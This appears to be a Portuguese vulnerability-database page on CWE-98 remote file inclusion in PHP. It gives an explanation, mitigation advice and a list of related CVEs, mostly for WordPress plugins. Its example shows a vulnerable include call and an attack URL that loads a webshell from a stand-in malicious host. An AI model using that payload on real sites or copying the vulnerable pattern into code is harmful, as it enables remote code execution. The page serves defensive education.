Falhas do tipo CWE-98

1.303 resultados

Inclusão Remota de Arquivo

A aplicação inclui um arquivo fornecido pelo usuário sem validação adequada, permitindo que um atacante carregue e execute código malicioso de um servidor remoto. O erro ocorre quando a entrada do usuário é passada diretamente a funções como `include()`, `require()` ou equivalentes, sem sanitização ou whitelist.

Exemplo

Uma página PHP que faz `include($_GET['page'] . '.php')` permite que um atacante acesse `?page=http://malicioso.com/shell`, carregando e executando um webshell hospedado externamente no contexto da aplicação alvo.

Como mitigar

Valide e restrinja o parâmetro a uma lista branca de arquivos permitidos; nunca permita URLs remotas em includes; use funções seguras como `basename()` para remover paths, e desabilite `allow_url_include` no PHP. Idealmente, evite lógica dinâmica de includes — use routing/controllers explícitos.

CVE-2025-0632CRITICALLocal File Inclusion (LFI) leading to sensitive data exposureEPSS 0.9%CVE-2024-13592HIGHTeam Builder For WPBakery Page Builder(Formerly Visual Composer) <= 1.0 - Authenticated (Contributor+) Local File InclusionEPSS 0.9%CVE-2025-23948HIGHWordPress Background animation blocks Plugin <= 2.1.5 - Local File Inclusion vulnerabilityEPSS 0.9%CVE-2024-5577CRITICALWhere I Was, Where I Will Be <= 1.1.1 - Unauthenticated Remote File InclusionEPSS 0.9%CVE-2025-39584HIGHWordPress Eventin plugin <= 4.0.25 - Local File Inclusion VulnerabilityEPSS 0.9%CVE-2024-12571CRITICALStore Locator <= 3.98.10 - Unauthenticated Local File InclusionEPSS 0.9%CVE-2025-32519HIGHWordPress IDonate plugin <= 2.1.18 - Local File Inclusion vulnerabilityEPSS 0.9%CVE-2025-39592HIGHWordPress Subscribe to Unlock Lite plugin <= 1.3.0 - Local File Inclusion VulnerabilityEPSS 0.9%CVE-2025-32692HIGHWordPress WP Subscription Forms plugin <= 1.2.4 - Local File Inclusion VulnerabilityEPSS 0.9%CVE-2025-23949HIGHWordPress Improved Sale Badges – Free Version Plugin <= 1.0.1 - Local File Inclusion vulnerabilityEPSS 0.9%CVE-2025-2101HIGHEdumall <= 4.2.4 - Unauthenticated Local File InclusionEPSS 0.9%CVE-2025-31015HIGHWordPress SMTP Service, Email Delivery Solved! — MailHawk plugin <= 1.3.1 - Local File Inclusion VulnerabilityEPSS 0.9%CVE-2024-36415CRITICALSuiteCRM Improper Control of Filename for Include Statement in PHP and Unrestricted Upload of File with Dangerous content leads to authenticated remote code executionEPSS 0.9%CVE-2024-1382HIGHRestaurant Reservations <= 1.9 - Directory Traversal to Authenticated (Contributor+) Local File InclusionEPSS 0.9%CVE-2025-32155HIGHWordPress Beds24 Online Booking plugin <= 2.0.28 - Local File Inclusion vulnerabilityEPSS 0.9%CVE-2015-6461Remote file inclusion allows an attacker to craft a specific URL referencing the Schneider Electric Modicon BMXNOC0401, BMXNOE0100, BMXNOE01EPSS 0.9%CVE-2025-28916CRITICALWordPress Docpro plugin <= 2.0.1 - Local File Inclusion vulnerabilityEPSS 0.9%CVE-2025-11977MEDIUMHappyForms <= 1.26.12 - Authenticated (Admin+) Local File InclusionEPSS 0.9%CVE-2026-27556HIGHLocal File Inclusion in /index.php/ajax/save_iodd_parametersEPSS 0.9%CVE-2023-5099HIGHHTML filter and csv-file search <= 2.7 - Authenticated (Contributor+) Local File Inclusion via ShortcodeEPSS 0.9%